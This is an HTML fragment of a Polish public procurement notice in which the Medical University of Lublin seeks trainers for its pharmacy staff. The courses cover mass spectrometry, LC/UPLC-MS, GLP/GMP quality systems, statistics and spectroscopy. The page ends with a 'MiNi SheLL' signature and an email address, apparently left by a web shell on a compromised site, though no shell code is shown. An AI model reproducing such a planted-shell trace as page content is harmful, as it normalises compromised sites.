<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2. Przeprowadzenie kursu dla pracowników naukowo-dydaktycznych Wydziału Farmaceutycznego na temat nowoczesnych metod spektroskopowych w analizie związków organicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Adresat: Pracownicy naukowo-dydaktyczni Wydziału Farmaceutycznego z Oddziałem Analityki Medycznej Uniwersytetu Medycznego w Lublinie 
Liczba uczestników: 26 pracowników UM
Forma i zakres szkolenia: Wykład dla wszystkich uczestników szkolenia
Czas trwania zajęć: Dwa dni wykładów po 5 godzin każdego dnia (łącznie 10 godzin)
Termin szkolenia: do 29.06.2012 - dokładne terminy zajęć zostaną ustalone po podpisaniu umowy.
Miejsce szkolenia: pomieszczenia Katedry i Zakładu Botaniki Farmaceutycznej (sala seminaryjna lub wykładowa Collegium Universum) Uniwersytetu Medycznego w Lublinie.
Zakres tematyczny szkolenia:
1.	Podstawy spektrometrii mas. Rodzaje źródeł jonów. Rodzaje analizatorów mas. Dobór odpowiedniego źródła jonów w zależności od analizowanej grupy substancji chemicznych.  Przygotowanie próbek dla poszczególnych metod spektroskopii, wpływ parametrów na jakość widma, pomiar widm masowych. Zasady interpretacji widm masowych- określenie masy cząsteczkowej i wzoru sumarycznego związku. Główne drogi fragmentacji związków organicznych. Zastosowanie metod spektroskopowych  w analizie leków i naturalnych surowców roślinnych. Wykorzystanie LC/MS w analizie próbek pochodzenia roślinnego (profilowanie metabolitów wtórnych, analiza danych, identyfikacja związków)
(4 godziny) T
2.	Techniki spektrometrii masowej wykorzystywane do badań substancji pochodzenia naturalnego:
metody jonizacji umożliwiające analizę substancji polarnych, termolabilnych,
możliwości sprzęgania spektrometrów masowych z technikami chromatograficznymi (chromatografia gazowa, chromatografia cieczowa, elektroforeza kapilarna) w przypadku badania mieszanin substancji izolowanych z materiału biologicznego,
tandemowa spektrometria masowa - możliwości zastosowań w badaniach biopolimerów oraz niskocząsteczkowych metabolitów wtórnych.
(4 godziny)
3.	Przykłady zastosowań MS do identyfikacji oraz badań roli produktów naturalnych, przy wykorzystaniu metody bezpośredniego wprowadzania próbek oraz sprzęgania chromatografu z spektrometrem masowym - profilowanie metabolitów wtórnych w próbkach izolowanych z materiału biologicznego:
zastosowanie technik MS w badaniach farmakologicznych leków,
możliwości wykorzystania technik MS w biotechnologii, ze szczególnym uwzględnieniem związków fenolowych,
badanie mechanizmów obronnych roślin w czasie oddziaływań z mikroorganizmami patogennymi lub symbiotycznymi (stres biotyczny) lub pod działaniem czynników fizykochemicznych (temperatura, susza, promieniowanie - stres abiotyczny).
(2 godziny).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7, 80.32.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3. Przeprowadzenie kursu szkoleniowego dla pracowników naukowo-dydaktycznych Wydziału Farmaceutycznego w zakresie analizy LC w połączeniu w układzie ESI-QTOF-MS.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Adresat: Pracownicy naukowo-dydaktyczni Wydziału Farmaceutycznego z Oddziałem Analityki Medycznej Uniwersytetu Medycznego w Lublinie 
Liczba uczestników: 20 pracowników UM
Forma szkolenia: Seminarium i ćwiczenia laboratoryjne 
Sposób prowadzenia zajęć: zajęcia prowadzone będą dla czterech grup po 5 osób.
Czas trwania zajęć: 12 godzin na każdą grupę (2 dni szkoleniowe x 6 godzin). Łączny czas szkolenia - 48 godzin szkoleniowych (8 dni).
Termin szkolenia: do 30.03.2012 - dokładne terminy zajęć zostaną ustalone po podpisaniu umowy.
Miejsce szkolenia: Zajęcia odbywać się będą w pomieszczeniach Katedry i Zakładu Chemii Leków Uniwersytetu Medycznego w Lublinie.

Zakres tematyczny szkolenia:
1 dzień - Metoda HPLC w połączeniu ze źródłem typu ESI i APCI oraz hybrydowym analizatorem masy potrójny kwadrupol-czasu przelotu (QTOF-MS/MS): podstawowe parametry techniczne, obsługa aparatu, parametry pracy analizatora QQQ-TOF i ich znaczenie, oprogramowanie MassHunter, Mass Profiler i MassHunter Metabolite ID oraz ChemStation
2 dzień - Praktyczne szkolenie z analizy HPLC-ESI, APCI-QTOF-MS/MS wybranych substancji leczniczych, i/lub ich metabolitów oraz produktów rozkładu. Przygotowanie fazy ruchomej, optymalizacja parametrów jonizacji, badanie fragmentacji związków w źródle jonów, pomiar dokładności masy oraz wyznaczanie wzoru sumarycznego produktów jonizacji; podstawowe parametry analizy ilościowej; wykorzystanie oprogramowania MassHunter, Mass Profiler i MassHunter Metabolite ID oraz ChemStation w analizie wybranych produktów leczniczych i/lub próbek biologicznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7, 80.32.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4. Przeprowadzenie kursu szkoleniowego dla pracowników naukowo-dydaktycznych Wydziału Farmaceutycznego w zakresie analizy UPLC w układzie ESI- MS/MS typu potrójny kwadrupol z pułapką jonową..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Adresat: Pracownicy naukowo-dydaktyczni Wydziału Farmaceutycznego z Oddziałem Analityki Medycznej Uniwersytetu Medycznego w Lublinie
Liczba uczestników: 14 pracowników UM
Forma szkolenia : Seminarium i Ćwiczenia laboratoryjne
Sposób prowadzenia zajęć: zajęcia prowadzone będą dla 4 grup 3-4 osobowych
Czas trwania zajęć: 12 godzin na każdą grupę (2 dni szkoleniowe x 6 godzin). Łączny czas szkolenia - 48 godzin szkoleniowych (8 dni).
Termin szkolenia: do 29.11.2012 - dokładne terminy zajęć zostaną ustalone po podpisaniu umowy.
Miejsce szkolenia: Pomieszczenia Katedry i Zakładu Botaniki Farmaceutycznej UM

Zakres tematyczny szkolenia:
Wprowadzenie do metody UHPLC sprzężonej ze spektrometrią mas (metody przygotowania próbki, rozdziału, metody detekcji). Optymalizacja warunków analizy w UHPLC. Skuteczne łączenie technik LC i MS. (seminarium 1 godzina)
Metoda UHPLC w połączeniu ze źródłem typu ESI, CI, APCI oraz analizatorem masy: Niestandardowe połączenia - Online-SPE, 2D-LC/MS. (ćwiczenia 2 godziny) 
Analiza ilościowa (metody, kalibracja, standaryzacja wyników) (ćwiczenia 4 godziny)
Analiza jakościowa (tryby pracy QTRAP) (ćwiczenia 3 godziny)
Warunkowe zbieranie i analiza danych. Praktyczne szkolenie z analizy UHPLC MS/MS wybranych naturalnych substancji leczniczych (przygotowanie próbki, dobór warunków analizy i parametrów jonizacji, badanie fragmentacji związków, identyfikacja jakościowa analizowanych substancji, podstawowe parametry analizy ilościowej; wykorzystanie oprogramowania w analizie). Analizy metabolitów roślinnych (ćwiczenia 3 godziny)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7, 80.32.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5. Przeprowadzenie kursu szkoleniowego dla pracowników naukowo-dydaktycznych Wydziału Farmaceutycznego w zakresie organizacji i dokumentacji nowoczesnego laboratorium. System zapewnienia jakości. Walidacja..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Adresat: Pracownicy naukowo-dydaktyczni Wydziału Farmaceutycznego z Oddziałem Analityki Medycznej Uniwersytetu Medycznego w Lublinie
Liczba uczestników: 22 pracowników naukowo-dydaktycznych
Forma szkolenia: wykłady
Sposób prowadzenia zajęć: wykład dla jednej grupy 22-osobowej.
Czas trwania zajęć: Łączny czas szkolenia dla wykonawcy zlecenia to 24 godzin szkoleniowych - 3 dni po 8 godzin wykładu.
Termin szkolenia: do 28.09.2012 - dokładne terminy zajęć zostaną ustalone po podpisaniu umowy.
Miejsce szkolenia: Zajęcia odbywać się będą w pomieszczeniach Katedry i Zakładu Chemii Leków Uniwersytetu Medycznego w Lublinie

Zakres tematyczny szkolenia:
1 dzień -
Opracowywanie i wprowadzanie systemu ISO 9001:2000.
System GLP w Polsce.
Procedury, SOP-y, instrukcje.
Wdrażanie procedur i dokumentacji GMP oraz GLP.
Nadzór nad właściwym prowadzeniem i archiwizacją dokumentacji Pionu Kontroli Jakości.
Zapewnienie jakości, inspekcje, personel.
Zatwierdzanie specyfikacji, instrukcji, metod badań oraz innych procedur KJ.
Kwalifikacja pomieszczeń według zasad GMP oraz GLP.
2 dzień -
Nadzór nad procesem produkcji.
Optymalizacja procesów produkcji.
Ocenianie wpisów w raportach serii produkcyjnych.
Identyfikacja punktów krytycznych dla poszczególnych technologii wytwarzania. 
Opracowywanie planu badań surowców, opakowań, produktów końcowych.
Nadzorowanie badań surowców, opakowań oraz produktów końcowych.
3 dzień -
Walidacje procedur pomiarowych i inne.
Nadzorowanie nad wykonywaniem i dokumentowaniem walidacji procedur analitycznych i kalibracji aparatury.
Prawidłowe systemy dokumentacji procedur analitycznych i kalibracji aparatury.
Zwalnianie do produkcji surowców i materiałów opakowaniowych, zwalnianie do obrotu wyrobów gotowych.
Zapisy, dane źródłowe, sprawozdanie końcowe, archiwizacja..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7, 80.32.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie 6. Przeprowadzenie kursu szkoleniowego dla pracowników naukowo-dydaktycznych Wydziału Farmaceutycznego w zakresie stosowania programów statystycznych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Adresat: Pracownicy naukowo-dydaktyczni Wydziału Farmaceutycznego z Oddziałem Analityki Medycznej Uniwersytetu Medycznego w Lublinie 
Liczba uczestników: 25 pracowników naukowo-dydaktycznych 
Forma szkolenia : Seminarium/Ćwiczenia na komputerach z oprogramowaniem.
Sposób prowadzenia zajęć: zajęcia prowadzone dla 2 grup 10-15 osobowych.
Czas trwania zajęć: 48 godzin szkoleniowych na każdą grupę (6 dni x 8 godzin). W tym po 16 godzin (2 dni) na każdy blok tematyczny. Łączny czas trwania szkolenia - 96 godzin szkoleniowych (12 dni)
Termin szkolenia: do 06.07.2012  - dokładne terminy zajęć zostaną ustalone po podpisaniu umowy.
Miejsce szkolenia: Uniwersytet Medyczny w Lublinie
Uwaga: Zamawiający wymaga uwzględniania w ofercie i przygotowania przez wykonawcę wszystkich 4 wskazanych niżej modułów szkoleniowych. Przy czym szkolenie dla poszczególnych grup zawierało będzie 3 moduły:
- dla grupy I przeprowadzone będą moduły II, III, IV.
- dla grupy II przeprowadzone będą moduły I, III, IV.

Cel i zakres tematyczny szkolenia:
Zdobycie praktycznej umiejętności posługiwania się programami statystycznymi do prawidłowej oceny i interpretacji otrzymywanych wyników badań w zakresie następujących bloków tematycznych:
I.   Zastosowania biostatystyki w medycynie i farmacji - metody podstawowe (kurs 2-dniowy) 
II.  Statystyka w walidacji metod pomiarowych (kurs 2-dniowy) 
III. Zastosowania biostatystyki w medycynie i farmacji - metody analizy wariancji i analizy regresji 
IV Analizy chemometryczne w STATISTICA 10 - kurs podstawowy (kurs 2-dniowy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7, 80.32.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie 7. Przeprowadzenie kursu szkoleniowego dla pracowników naukowo-dydaktycznych Wydziału Farmaceutycznego w zakresie interpretacji wyników otrzymanych w innowacyjnych (zaawansowanych) technikach spektroskopowych (widma UV, FTIR,MS, Raman, NMR)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Adresat: Pracownicy naukowo-dydaktyczni Wydziału Farmaceutycznego z Oddziałem Analityki Medycznej Uniwersytetu Medycznego w Lublinie
Liczba uczestników: 26 pracowników naukowo-dydaktycznych 
Forma szkolenia: Zajęcia seminaryjne i pokazowe w laboratorium analitycznym 
Sposób prowadzenia zajęć: zajęcia prowadzone dla 5 grup 5-6 osobowych.
Czas trwania zajęć: 10 godzin szkoleniowych na każdą grupę (2 dni x 5 godzin). Łączny czas szkolenia - 50 godzin szkoleniowych (10 dni).
Termin szkolenia: do 28.02.2013 - dokładne terminy zajęć zostaną ustalone po podpisaniu umowy.
Miejsce szkolenia: Wskazane i zapewnione przez wykonawcę zlecenia, odpowiednio wyposażone laboratorium analityczne na terenie m. Lublina.

Cel i zakres tematyczny szkolenia:
1.	Zaznajomienie się z podstawami metod spektroskopowych i ich zastosowaniem do identyfikacji związków organicznych.
2.	Zasady identyfikacji głównych grup związków organicznych, identyfikacja podstawników, konfiguracja stereochemiczna, metody  określania masy cząsteczkowej substancji.
3.	Analiza spektralna w przykładach. Wykorzystanie informacji z widm masowych, UV, FTIR, Ramana, NMR i danych dyfrakcyjnych do ustalenia struktury molekularnej związków organicznych i biomateriałów.
4.	Praktyczne zastosowania metod spektroskopowych. Demonstracja aparatury, techniki analityczne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.30.00.00-7, 80.32.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com